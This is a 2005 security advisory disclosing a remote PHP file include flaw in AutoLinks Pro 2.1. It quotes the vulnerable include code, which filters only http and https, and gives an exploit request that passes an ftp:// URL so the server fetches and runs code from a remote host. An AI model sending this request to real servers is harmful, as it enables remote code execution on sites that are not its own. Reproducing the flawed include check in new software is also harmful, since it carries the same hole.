autolinks21.txt

`[NewAngels Advisory #1] AutoLinks Pro 2.1 - Remote File Include Vulnerability  
=============================================================================  
  
  
Software: AutoLinks Pro  
Version: 2.1  
Type: Remote PHP File Include Vulnerability  
Risc: High  
  
Date: 16.08.05  
Vendor: ScriptsCenter  
Page: http://www.scriptscenter.com/  
  
  
  
Credit:  
=======  
Credit goes to NewAngels Team and especially 4Degrees.  
  
  
  
Description:  
============  
"AutoLinks 2.1 is a full-featured script making life easier for webmasters  
relying extensively on link exchanges to bring traffic to their site. Other  
webmasters are able to easily exchange links with you, bringing more visitors  
to your site and you also have full control on what sites you want to link."  
[Quote from http://www.scriptscenter.com/]  
  
  
  
PHP Requirements:  
=================  
register_globals = On  
  
  
  
Vulnerability:  
=============  
Related source from file "autolinks/al_initialize.php":  
  
>// check for hacking attempt  
>if(strstr($alpath,"http://") || strstr($alpath,"https://")) exit("Invalid \$alpath variable");  
>  
>include($alpath."al_functions.php");  
  
The script does not check wether $alpath contains an absolute URL to a remote  
ftp resource.  
  
  
  
Exploitation:  
=============  
/al_initialize.php?alpath=ftp://host.com/  
  
The code in "al_functions.php" will be executed.  
`